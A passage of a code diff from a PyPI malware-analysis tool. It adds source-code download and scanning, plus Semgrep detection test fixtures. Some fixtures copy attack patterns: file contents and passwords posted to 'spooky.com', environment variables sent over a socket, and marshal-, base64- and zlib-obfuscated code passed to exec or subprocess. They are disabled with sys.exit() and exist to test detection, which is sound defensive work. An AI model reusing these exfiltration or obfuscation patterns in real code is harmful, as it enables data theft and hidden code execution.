macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer from macaron.slsa_analyzer.analyze_context 
import AnalyzeContext @@ -102,26 +102,46 @@ def _should_skip( return True return False - def validate_malware(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[bool, dict[str, JsonType] | None]: - """Validate the package is malicious. + def analyze_source( + self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult], force: bool = False + ) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package with a textual scan, looking for malicious code patterns. Parameters ---------- pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + results: dict[Heuristics, HeuristicResult] + Containing all heuristics' results (excluding this one), where the key is the heuristic and the value is the result + associated with that heuristic. + force: bool + Forces sourcecode analysis to run regardless of heuristic results. Defaults to False. Returns ------- - tuple[bool, dict[str, JsonType] | None] - Returns True if the source code includes suspicious pattern. - Returns the result of the validation including the line number - and the suspicious arguments. - e.g. requests.get("http://malicious.com") - return the "http://malicious.com" + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + If the analyzer fails due to malformed package information. + ConfigurationError + If the configuration of the analyzer encountered a problem. 
""" - # TODO: This redundant function might be removed - sourcecode_analyzer = PyPISourcecodeAnalyzer(pypi_package_json) - is_malware, detail_info = sourcecode_analyzer.analyze() - return is_malware, detail_info + logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) + analyzer = PyPISourcecodeAnalyzer() + + if not force and analyzer.depends_on and self._should_skip(results, analyzer.depends_on): + return HeuristicResult.SKIP, {} + + try: + with pypi_package_json.sourcecode(): + return analyzer.analyze(pypi_package_json) + except SourceCodeError as error: + error_msg = f"Unable to perform analysis, source code not available: {error}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from error def evaluate_heuristic_results( self, heuristic_results: dict[Heuristics, HeuristicResult] @@ -281,6 +301,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, + package_sourcecode_path="", ) pypi_registry_info.metadata.append(pypi_package_json) @@ -288,28 +309,39 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # Download the PyPI package JSON, but no need to persist it to the filesystem. 
if pypi_package_json.package_json or pypi_package_json.download(dest=""): try: - result, detail_info = self.run_heuristics(pypi_package_json) + heuristic_results, heuristics_detail_info = self.run_heuristics(pypi_package_json) except HeuristicAnalyzerValueError: return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) - confidence, triggered_rules = self.evaluate_heuristic_results(result) - detail_info["triggered_rules"] = triggered_rules + confidence, triggered_rules = self.evaluate_heuristic_results(heuristic_results) + heuristics_detail_info["triggered_rules"] = triggered_rules result_type = CheckResultType.FAILED if not confidence: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - elif ctx.dynamic_data["validate_malware"]: - is_malware, validation_result = self.validate_malware(pypi_package_json) - if is_malware: # Find source code block matched the malicious pattern - confidence = Confidence.HIGH - elif validation_result: # Find suspicious source code, but cannot be confirmed - confidence = Confidence.MEDIUM - logger.debug(validation_result) + + # optional sourcecode analysis feature + if ctx.dynamic_data["analyze_source"]: + try: + sourcecode_result, sourcecode_detail_info = self.analyze_source( + pypi_package_json, heuristic_results, force=ctx.dynamic_data["force_analyze_source"] + ) + except (HeuristicAnalyzerValueError, ConfigurationError): + return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) + + heuristic_results[Heuristics.SUSPICIOUS_PATTERNS] = sourcecode_result + heuristics_detail_info.update(sourcecode_detail_info) + + if sourcecode_result == HeuristicResult.FAIL: + if result_type == CheckResultType.PASSED: + # heuristics determined it benign, so lower the confidence + confidence = Confidence.LOW + result_type = CheckResultType.FAILED result_tables.append( MaliciousMetadataFacts( - result=result, - detail_information=detail_info, + result=heuristic_results, + 
detail_information=heuristics_detail_info, confidence=confidence, ) ) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index b0b0275b5..2c6af515c 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -5,10 +5,13 @@ import logging import os +import re +import shutil import tarfile import tempfile import urllib.parse -import zipfile +from collections.abc import Callable, Generator, Iterator +from contextlib import contextmanager from dataclasses import dataclass from datetime import datetime @@ -17,7 +20,7 @@ from requests import RequestException from macaron.config.defaults import defaults -from macaron.errors import ConfigurationError, InvalidHTTPResponseError +from macaron.errors import ConfigurationError, InvalidHTTPResponseError, SourceCodeError from macaron.json_tools import json_extract from macaron.malware_analyzer.datetime_parser import parse_datetime from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry @@ -26,6 +29,10 @@ logger: logging.Logger = logging.getLogger(__name__) +def _handle_temp_dir_clean(function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + class PyPIRegistry(PackageRegistry): """This class implements the pypi package registry.""" @@ -159,77 +166,102 @@ def download_package_json(self, url: str) -> dict: return res_obj - def fetch_sourcecode(self, src_url: str) -> dict[str, str] | None: - """Get the source code of the package. + def download_package_sourcecode(self, url: str) -> str: + """Download the package source code from pypi registry. + + Parameters + ---------- + url: str + The package source code url. Returns ------- - str | None - The source code. + str + The temp directory with the source code. 
+ + Raises + ------ + InvalidHTTPResponseError + If the HTTP request to the registry fails or an unexpected response is returned. """ # Get name of file. - _, _, file_name = src_url.rpartition("/") - - # Create a temporary directory to store the downloaded source. - with tempfile.TemporaryDirectory() as temp_dir: + _, _, file_name = url.rpartition("/") + package_name = re.sub(r"\.tar\.gz$", "", file_name) + + # temporary directory to unzip and read all source files + temp_dir = tempfile.mkdtemp(prefix=f"{package_name}_") + response = send_get_http_raw(url, stream=True) + if response is None: + error_msg = f"Unable to find package source code using URL: {url}" + logger.debug(error_msg) try: - response = requests.get(src_url, stream=True, timeout=40) - response.raise_for_status() - except requests.exceptions.HTTPError as http_err: - logger.debug("HTTP error occurred: %s", http_err) - return None + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception - if response.status_code != 200: - return None + raise InvalidHTTPResponseError(error_msg) - source_file = os.path.join(temp_dir, file_name) - with open(source_file, "wb") as file: - try: - for chunk in response.iter_content(): - file.write(chunk) - except RequestException as error: - # Something went wrong with the request, abort. 
- logger.debug("Error while streaming source file: %s", error) - response.close() - return None - logger.debug("Begin fetching the source code from PyPI") - py_files_content: dict[str, str] = {} - if tarfile.is_tarfile(source_file): + with tempfile.NamedTemporaryFile("+wb", delete=True) as source_file: + try: + for chunk in response.iter_content(): + source_file.write(chunk) + source_file.flush() + except RequestException as stream_error: + error_msg = f"Error while streaming source file: {stream_error}" + logger.debug(error_msg) try: - with tarfile.open(source_file, "r:gz") as tar: - for member in tar.getmembers(): - if member.isfile() and member.name.endswith(".py") and member.size > 0: - file_obj = tar.extractfile(member) - if file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[member.name] = content - except tarfile.ReadError as exception: - logger.debug("Error reading tar file: %s", exception) - return None - elif zipfile.is_zipfile(source_file): + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from RequestException + + if tarfile.is_tarfile(source_file.name): try: - with zipfile.ZipFile(source_file, "r") as zip_ref: - for info in zip_ref.infolist(): - if info.filename.endswith(".py") and not info.is_dir() and info.file_size > 0: - with zip_ref.open(info) as file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[info.filename] = content - except zipfile.BadZipFile as bad_zip_exception: - logger.debug("Error reading zip file: %s", bad_zip_exception) - return None - except zipfile.LargeZipFile as large_zip_exception: - logger.debug("Zip file too large to read: %s", large_zip_exception) - return None - # except KeyError as zip_key_exception: - # logger.debug( - # 
"Error finding target '%s' in zip file '%s': %s", archive_target, source_file, zip_key_exception - # ) - # return None + with tarfile.open(source_file.name, "r:gz") as sourcecode_tar: + sourcecode_tar.extractall(temp_dir, filter="data") + + except tarfile.ReadError as read_error: + error_msg = f"Error reading source code tar file: {read_error}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from read_error + + extracted_dir = os.listdir(temp_dir) + if len(extracted_dir) == 1 and package_name == extracted_dir[0]: + # structure used package name and version as top-level directory + temp_dir = os.path.join(temp_dir, extracted_dir[0]) + else: - logger.debug("Unable to extract file: %s", file_name) + error_msg = f"Unable to extract source code from file {file_name}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception + + raise InvalidHTTPResponseError(error_msg) - logger.debug("Successfully fetch the source code from PyPI") - return py_files_content + logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) + return temp_dir def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -389,6 +421,9 @@ class PyPIPackageJsonAsset: #: The asset content. package_json: dict + #: the source code temporary location name + package_sourcecode_path: str + #: The size of the asset (in bytes). 
This attribute is added to match the AssetLocator #: protocol and is not used because pypi API registry does not provide it. @property @@ -518,16 +553,120 @@ def get_latest_release_upload_time(self) -> str | None: return upload_time return None - def get_sourcecode(self) -> dict[str, str] | None: - """Get source code of the package. + @contextmanager + def sourcecode(self) -> Generator[None]: + """Download and cleanup source code of the package with a context manager.""" + if not self.download_sourcecode(): + raise SourceCodeError("Unable to download package source code.") + yield + self.cleanup_sourcecode() + + def download_sourcecode(self) -> bool: + """Get the source code of the package and store it in a temporary directory. Returns ------- - dict[str, str] | None - The source code of each script in the package + bool + ``True`` if the source code is downloaded successfully; ``False`` if not. """ - url: str | None = self.get_sourcecode_url() + url = self.get_sourcecode_url() if url: - source_code: dict[str, str] | None = self.pypi_registry.fetch_sourcecode(url) - return source_code - return None + try: + self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode(url) + return True + except InvalidHTTPResponseError as error: + logger.debug(error) + return False + + def cleanup_sourcecode(self) -> None: + """ + Delete the temporary directory created when downloading the source code. + + The package source code is no longer accessible after this, and the package_sourcecode_path + attribute is set to an empty string. 
+ """ + if self.package_sourcecode_path: + try: + shutil.rmtree(self.package_sourcecode_path, onerror=_handle_temp_dir_clean) + self.package_sourcecode_path = "" + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {self.package_sourcecode_path}" + f" for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise tempdir_exception + + def get_sourcecode_file_contents(self, path: str) -> bytes: + """ + Get the contents of a single source code file specified by the path. + + The path can be relative to the package_sourcecode_path attribute, or an absolute path. + + Parameters + ---------- + path: str + The absolute or relative to package_sourcecode_path file path to open. + + Returns + ------- + bytes + The raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded, or there is an error accessing the file. + """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + if not os.path.isabs(path): + path = os.path.join(self.package_sourcecode_path, path) + + if not os.path.exists(path): + error_msg = f"Unable to locate file {path}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + try: + with open(path, "rb") as file: + return file.read() + except OSError as read_error: + error_msg = f"Unable to read file {path}: {read_error}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) from read_error + + def iter_sourcecode(self) -> Iterator[tuple[str, bytes]]: + """ + Iterate through all source code files. + + Returns + ------- + tuple[str, bytes] + The source code file path, and the the raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded. 
+ """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + for root, _directories, files in os.walk(self.package_sourcecode_path): + for file in files: + if root == ".": + root_path = os.getcwd() + os.linesep + else: + root_path = root + filepath = os.path.join(root_path, file) + + with open(filepath, "rb") as handle: + contents = handle.read() + + yield filepath, contents diff --git a/src/macaron/util.py b/src/macaron/util.py index d037ead10..96af86991 100644 --- a/src/macaron/util.py +++ b/src/macaron/util.py @@ -131,6 +131,7 @@ def send_get_http_raw( timeout: int | None = None, allow_redirects: bool = True, check_response_fails: bool = True, + stream: bool = False, ) -> Response | None: """Send the GET HTTP request with the given url and headers. @@ -148,6 +149,8 @@ def send_get_http_raw( Whether to allow redirects. Default: True. check_response_fails: bool When True, check if the response fails. Otherwise, return the response. + stream: bool + Indicates whether the response should be immediately downloaded (False) or streamed (True). Default: False. 
Returns ------- @@ -164,10 +167,7 @@ def send_get_http_raw( retry_counter = error_retries try: response = requests.get( - url=url, - headers=headers, - timeout=timeout, - allow_redirects=allow_redirects, + url=url, headers=headers, timeout=timeout, allow_redirects=allow_redirects, stream=stream ) except requests.exceptions.RequestException as error: logger.debug(error) diff --git a/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/check_sourcecode_patterns.sh b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/check_sourcecode_patterns.sh new file mode 100755 index 000000000..fa2d73d3b --- /dev/null +++ b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/check_sourcecode_patterns.sh @@ -0,0 +1,14 @@ +#!/bin/bash +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. +result=$(sqlite3 --json output/macaron.db "SELECT detect_malicious_metadata_check.result + FROM detect_malicious_metadata_check JOIN check_facts on detect_malicious_metadata_check.id = check_facts.id + JOIN check_result on check_facts.check_result_id = check_result.id JOIN component + ON component.id = check_result.component_id WHERE check_result.check_id = 'mcn_detect_malicious_metadata_1' + AND component.name = 'django' AND component.version = '5.0.6';" | jq -r ".[0].result | fromjson | .suspicious_patterns") + +if [ "$result" != "PASS" ]; then + echo "ERROR: suspicious_patterns heuristic result $result is not PASS" >&2 + exit 1 +fi +exit 0 diff --git a/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/policy-sourcecode.dl b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/policy-sourcecode.dl new file mode 100644 index 000000000..f6aec96ac --- /dev/null +++ b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/policy-sourcecode.dl @@ -0,0 
+1,10 @@ +/* Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("check_sourcecode_malware_analysis", component_id, "Checks malware analysis with sourcecode analysis.") :- + check_passed(component_id, "mcn_detect_malicious_metadata_1"). + +apply_policy_to("check_sourcecode_malware_analysis", component_id) :- + is_component(component_id, "pkg:pypi/django@5.0.6"). diff --git a/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/test.yaml b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/test.yaml index ddc7a4abb..4d2836188 100644 --- a/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/test.yaml +++ b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/test.yaml @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. description: | @@ -66,6 +66,29 @@ steps: kind: verify options: policy: policy-all-pypi.dl +# optional Semgrep sourcecode analysis +- name: Clean up the database. + kind: shell + options: + cmd: rm -f output/macaron.db +- name: Run macaron analyze with forced sourcecode analysis + kind: analyze + options: + command_args: + - -purl + - pkg:pypi/django@5.0.6 + - --python-venv + - ./django_venv + - --analyze-source + - --force-analyze-source +- name: Run macaron verify-policy to check the package was not marked as malicious. + kind: verify + options: + policy: policy-sourcecode.dl +- name: Query the output database to verify the suspicious_patterns rull passed. + kind: shell + options: + cmd: ./check_sourcecode_patterns.sh - name: Clean up the virtual environment. 
kind: shell options: diff --git a/tests/malware_analyzer/pypi/resources/custom_sample.yaml b/tests/malware_analyzer/pypi/resources/custom_sample.yaml new file mode 100644 index 000000000..04603d2de --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/custom_sample.yaml @@ -0,0 +1,23 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +# This is a sample file designed to ensure the functionality for providing +# custom Semgrep rules works as expected + +rules: +- id: custom_sample_1 + metadata: + description: Detects the statement for disabling exports + message: Detected disabling of exports + languages: + - python + severity: ERROR + pattern: __all__ = [] +- id: custom_sample_2 + metadata: + description: Detects sys.exit() + message: Detected sys.exit() + languages: + - python + severity: ERROR + pattern: sys.exit() diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json new file mode 100644 index 000000000..ef19d6c0e --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -0,0 +1,25 @@ +{ + "enabled_sourcecode_rule_findings": { + "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": { + "message": "Detected exfiltration of sensitive data to a remote endpoint", + "detections": [ + { + "file": "exfiltration/remote_exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 42, + "end": 42 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 50, + "end": 50 + } + ] + } + }, + "disabled_sourcecode_rule_findings": {} +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py 
b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py new file mode 100644 index 000000000..e2602ef1f --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py @@ -0,0 +1,50 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. 
+ + def os_to_requests(): + import os + + import requests + with os.popen("cat important_file") as pipe: + requests.post("spooky.com", data=pipe.read()) + + def file_exfil_to_urllib3(): + import os as oo + + import urllib3 as uuu + op = oo.O_RDWR + do_it = oo.open + file = do_it("every_password", op) + man = uuu.PoolManager + http = man().request + http('POST', "spooky.com", body=oo.read(file, 2048)) + + def environ_to_socket(): # nosemgrep + import socket as s # nosemsemgrep + from os import environ as environment_vars # nosemgrep + with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: # nosemgrep + soc.connect(('localhost', 0)) # nosemgrep + other = soc # nosemgrep + other.send(environment_vars) # nosemgrep diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py new file mode 100644 index 000000000..114072a52 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py @@ -0,0 +1,67 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. 
+ + # marshal encryption from pyobfuscate.com/marshal-encrypt, script is just print("Hello world!") + def marshal_flow(): + from marshal import loads + bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') + exec(bytecode) + + def marshal_inline_flow(): + exec(__import__('marshal').loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00')) + + def bytes_eval_to_soc_bind(): + import socket + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as soc: + soc.bind(__import__('builtins').eval(b'("127.0.0.1", 0)'.decode())) + + def map_b64_to_request(): + import requests as req + + # decodes to GET + method = __import__('base64').b64decode(b'R0VU') + # just maps to a random fake link https://www.print-hello-world-sample.com/print/hello/world! 
+ link = ''.join(map(chr, [104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 112, 114, 105, 110, 116, 45, 104, 101, 108, 108, 111, 45, 119, 111, 114, 108, 100, 45, 115, 97, 109, 112, 108, 101, 46, 99, 111, 109, 47, 112, 114, 105, 110, 116, 47, 104, 101, 108, 108, 111, 47, 119, 111, 114, 108, 100, 33])) + _ = req.Request(method, link) + + def zlib_ast_subprocess(): + import subprocess + import zlib as zeeee + from ast import literal_eval + + # just decodes to ["echo", "Hello world!"] + subprocess.Popen(literal_eval(zeeee.decompress(b'x\x9c\x8bVOM\xce\xc8W\xd7QP\xf7H\xcd\xc9\xc9W(\xcf/\xcaIQT\x8f\x05\x00]\xa0\x07\x9d').decode())) + + def propagation_to_write(): + import os as e + + # symbol propagations should detect assign of os as e to o and bytes to b and still trigger + o = e + b = bytes + # just decodes to "Hello world!" + contents = b.fromhex("48656C6C6F20776F726C6421") + # just decodes to "some_path" + file = o.open(''.join(chr(c) for c in [115, 111, 109, 101, 95, 112, 97, 116, 104]), o.O_RDWR) + o.pwritev(file, contents, 0) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json new file mode 100644 index 000000000..aabf72e18 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -0,0 +1,235 @@ +{ + "enabled_sourcecode_rule_findings": { + "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": { + "message": "Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + 
"start": 47, + "end": 47 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": { + "message": "Found an instance of a suspicious API in a hardcoded inline import", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 44, + "end": 44 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 24, + "end": 24 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 29, + "end": 29 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 31, + "end": 31 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 32, + "end": 32 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 69, + "end": 69 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": { + "message": "Found an indicator of the use of a python code obfuscation tool", + "detections": [ + { + "file": "obfuscation/obfuscation_tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 28, 
+ "end": 28 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 40, + "end": 40 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 65, + "end": 65 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + } + ] + } + }, + "disabled_sourcecode_rule_findings": {} +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py new file mode 100644 index 000000000..80e006781 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py @@ -0,0 +1,32 @@ +# 
Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + __import__('base64') + __import__('builtins') + __import__('subprocess') + __import__('sys') + __import__('os') + __import__('zlib') + __import__('marshal') + # these both just import builtins + __import__('\142\165\151\154\164\151\156\163') + __import__('\x62\x75\x69\x6c\x74\x69\x6e\x73') diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py new file mode 100644 index 000000000..270f88600 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py @@ -0,0 +1,69 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code 